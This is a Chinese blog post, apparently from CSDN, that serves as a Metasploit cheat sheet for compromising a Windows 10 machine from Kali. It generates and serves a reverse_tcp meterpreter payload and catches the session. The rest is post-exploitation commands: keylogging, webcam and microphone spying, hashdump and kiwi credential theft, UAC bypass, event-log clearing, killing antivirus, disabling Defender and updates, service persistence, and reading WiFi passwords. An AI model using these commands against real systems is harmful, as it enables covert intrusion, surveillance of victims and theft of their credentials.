msfconsole和msfvenom大全kali

#创作高流量

Kali使用msf,msfconsole,msfvenom对Windows 10专业版渗透提权

(老铁铁们,三联走起)

Who,where,what,when,which,why,how,how much

1.生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.125.129 LPORT=4545 -f exe > shell.exe  

2.kali开启挂载,Windows下载要关闭实时保护

python3 -m http.server 80 

3.kali打开

msfconsole 

4.开启监听连接

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.125.129

set lport 4545

show options

run

4.Windows双击shell.exe

kali出现meterpreter

exploit -z -j   后台执行

run vnc -i  监控屏幕

5.查看此时你的用户权限

Getuid

6. 让meterpreter处于后台模式

background

sessions -i index # 与会话进行交互,index表示第一个session  选择目标

session -i 3

quit # 退出会话

shell # 获得控制台权限

  1. 文件操作命令

getwd 或者pwd # 查看当前工作目录 

ls

cd

cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容

upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上

download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上

edit c:\\1.txt #编辑或创建文件  没有的话,会新建文件

rm C:\\lltest\\hack.txt

mkdir lltest2  #只能在当前目录下创建文件夹

rmdir lltest2  #只能删除当前目录下文件夹

getlwd   或者 lpwd   #操作攻击者主机 查看当前目录

lcd /tmp   #操作攻击者主机 切换目录

search -f *secret*.doc  #全局搜索secret.doc这个文件

  1. 网络操作指令

ipconfig / ifconfig # 查看网络接口信息

Portfwd # 端口转发 本机监听端口 把目标机端口转到本机端口上

Rdesktop # 使用rdesktop来连接 -u 用户名 -p 密码

Route # 获取路由表信息

  1. 系统命令

ps # 查看当前活跃进程

migrate pid # 将Meterpreter会话移植到进程数位pid的进程中

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

getpid # 获取当前进程的pid

kill pid # 杀死进程

getuid # 查看权限

sysinfo # 查看目标机系统信息,如机器名,操作系统等

shutdown # 关机

  1. 开关键盘鼠标

uictl disable mouse  #禁用鼠标

uictl disable keyboard  #禁用键盘

uictl enable mouse  #开启鼠标

  1. 摄像头

webcam_list  #查看摄像头

webcam_snap   #通过摄像头拍照

webcam_stream   #通过摄像头开启视频

  1. 执行文件

meterpreter > execute

meterpreter > execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

cmd.exe的路径是跟我们的木马是在一个路径下的

  1. 进程迁移

ps

migrate [pid]

getpid    # 获取当前进程的pid

ps   # 查看当前活跃进程

migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中

kill <pid值>   #杀死进程

  1. 清除日志

clearev #清除windows中的应用程序日志、系统日志、安全日志,需要管理员权限

  1. 自动化信息收集

run post/windows/gather/checkvm #是否虚拟机

run post/linux/gather/checkvm #是否虚拟机

run post/windows/gather/forensics/enum_drives #查看分区

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks   #获取最近的文件操作

run post/windows/gather/enum_ie  #获取IE缓存

run post/windows/gather/enum_chrome   #获取Chrome缓存

run post/windows/gather/enum_patches  #补丁信息

run post/windows/gather/enum_domain  #查找域控

  1. 权限提升

Getsystem

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection

use windows/local/bypassuac_vbs

use windows/local/ask

  1. 远程桌面和截屏

enumdesktops  #查看可用的桌面

getdesktop    #获取当前meterpreter 关联的桌面

set_desktop   #设置meterpreter关联的桌面  -h查看帮助

screenshot  #截屏

use espia  #或者使用espia模块截屏  然后输入screengrab

run vnc  #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了

  1. 关闭杀软

meterpreter > run post/windows/manage/killav //这个脚本要小心使用,可能导致目标机器蓝屏死机

  1. 获取hash

Hashdump

  1. 明文密码

load kiwi

creds_call

  1. 扫描脚本

use auxiliary/scanner/http/dir_scanner

use auxiliary/scanner/http/jboss_vulnscan

use auxiliary/scanner/mssql/mssql_login

use auxiliary/scanner/mysql/mysql_version

use auxiliary/scanner/oracle/oracle_login

退出

quit

cmd指令:

cat 读取文件内容到屏幕                                                              

cd 更改目录

checksum 检索文件的校验和

cp 将源复制到目标

del 删除指定文件

dir 列出文件(ls 的别名)

下载 下载文件或目录

编辑 编辑文件

getlwd 打印本地工作目录

getwd 打印工作目录

lcd 更改本地工作目录

lls 列出本地文件

lpwd 打印本地工作目录

ls 列出文件

mkdir 创建目录

mv 将源移动到目标

pwd 打印工作目录

rm 删除指定文件

rmdir 删除目录

search 搜索文件

show_mount 列出所有挂载点/逻辑驱动器

upload 上传文件或目录

pkill 按名称终止进程

meterpreter命令:

keyscan_start 开始捕获击键(开始键盘记录)

keyscan_dump 转储按键缓冲(下载键盘记录)

keyscan_stop 停止捕获击键(停止键盘记录)

record_mic X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat 开始视频聊天(视频,对方会有弹窗)

webcam_list 单摄像头(查看摄像头列表)

webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)

enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)

getdesktop 得到当前的Meterpreter桌面

reboot 重新启动远程计算机

shutdown 关闭远程计算机

shell 放入系统命令 shell

enumdesktops 列出所有可访问的桌面和窗口站

getdesktop 获取当前的meterpreter桌面

idletime 返回远程用户空闲的秒数

keyboard_send 发送击键

keyevent 发送按键事件

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

mouse 发送鼠标事件

screenshare 实时观看远程用户桌面

screenshot 抓取交互式桌面的屏幕截图

setdesktop 更改 Meterpreters 当前桌面

uictl 控制一些用户界面组件

record_mic 从默认麦克风录制音频 X 秒

webcam_chat 开始视频聊天

webcam_list 列出网络摄像头

webcam_snap 从指定的网络摄像头拍摄快照

webcam_stream 播放来自指定网络摄像头的视频流

play 在目标系统上播放波形音频文件 (.wav)

getsystem 尝试将您的权限提升到本地系统的权限

execute -f notepad 打开记事本

1.首先,检测目标机器中是否存在该漏洞。使用wmic查询命令,列出目标机器中所有没有被引号引起来的服务的路径

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

结果返回:

  D:\softwarePath\Nessus\nessus-service.exe                                       D:\softwarePath\vmware16\vmware-authd.exe    

Windows:

systeminfo | findstr OS #获取系统版本信息

systeminfo&&wmic product get name,version&&wmic nic where PhysicalAdapter=True get MACAddress,Name&&wmic NICCONFIG WHERE IPEnabled=true GET IPAddress #检测系统软件包

hostname #获取主机名称

whoami /all #获取当前用户的详细信息

whoami /priv #显示当前用户的安全特权

net start #查看服务

quser #获取在线用户

query user #获取在线用户

netstat -ano | findstr 3389 #获取rdp连接(远程桌面协议)来源IP

dir c:\programdata\ #分析安装

wmic qfe get Caption,Description,HotFixID,InstalledOn #列出已安装的补丁

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口

tasklist /svc | find "TermService" #获取服务pid

netstat -ano |find "pid" #获取远程端口                               

PowerShell

使用 PowerShell 安装 Microsoft Defender 防病毒

Install-WindowsFeature -Name Windows-Defender

验证 Microsoft Defender 防病毒是否正在服务器上运行

Get-Service -Name windefend

验证防火墙保护是否打开

Get-Service -Name mpssvc

使用 PowerShell 打开 GUI

Install-WindowsFeature -Name Windows-Defender-GUI

卸载 Windows Server 2016 或 Windows Server 2019 上的 Microsoft Defender 防病毒

Uninstall-WindowsFeature -Name Windows-Defender

关闭 Microsoft Defender 防病毒 GUI

Uninstall-WindowsFeature -Name Windows-Defender-GUI

Power shell

更改执行策略

Set-ExecutionPolicy Unrestricted

选A

#如果提示在此系统上禁止运行脚本,先执行以下命令即可

Powershell -ExecutionPolicy Bypass

暂时

    禁用Microsoft Defender防病毒软件

    Set-MpPreference -DisableRealtimeMonitoring $true

    如要禁用防病毒,请关闭“篡改防护”。

    启用Microsoft Defender防病毒软件

    Set-MpPreference -DisableRealtimeMonitoring $false

    禁用/启用Microsoft Defender防病毒软件的行为扫描

    Set-MpPreference -DisableBehaviorMonitoring $true(禁用)

    Set-MpPreference -DisableBehaviorMonitoring $false(启用)

永久组策略关闭实时保护

Win+R gpedit

管理模板

Windows组件

Microsoft Defender 防病毒

实时保护  双击已启用关闭  确定

泥煤的,不要每次启动都打开

还有一种是注册表关闭

防火墙关闭

Cmd、powershell

(一)永久组策略关闭Windows更新

1、打开运行对话框,可以使用“windows徽标键+R”键快捷打开,输入“gpedit.msc”;

2、左侧在计算机配置中,找到管理模板,右侧找到Windows组件;

3.  双击进入后,找到Windows更新;

4.  找到“配置自动更新”,双击进入;

5、在弹出的窗口中,单击“已禁用”,然后单击确定按钮即可。

(二)服务

  1. 打开运行对话框,输入“services.msc”;
  2. 在弹出的窗口中,右侧找到“Windows update”;
  3. 双击进入,在启动类型下拉列表中,单击“禁用”,然后确定;

4、可以看到已禁用自动更新。

6.查看此时你的用户权限

Getuid

7.search suggester 查看适合的漏洞

8.使用漏洞

Use 0

Set sessions 1 设置目标Windows 10的会话

Run 开始执行

乱码解决

Hashdump后

获取明文密码,Kevin第二个

不知道为什么防火墙打开了

Getpid

服务自启动权限维持

sc create test binpath= c:\666.exe (注意等号后面有空格)#创建服务

sc config test start= auto #设置服务为自动启动

net start test #启动服务

服务器没有响应控制,gg

电脑cmd查看WiFi密码

netsh wlan show profile name="连接名" key=clear

netsh wlan show profile name=连接名 key=clear

  • 36
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值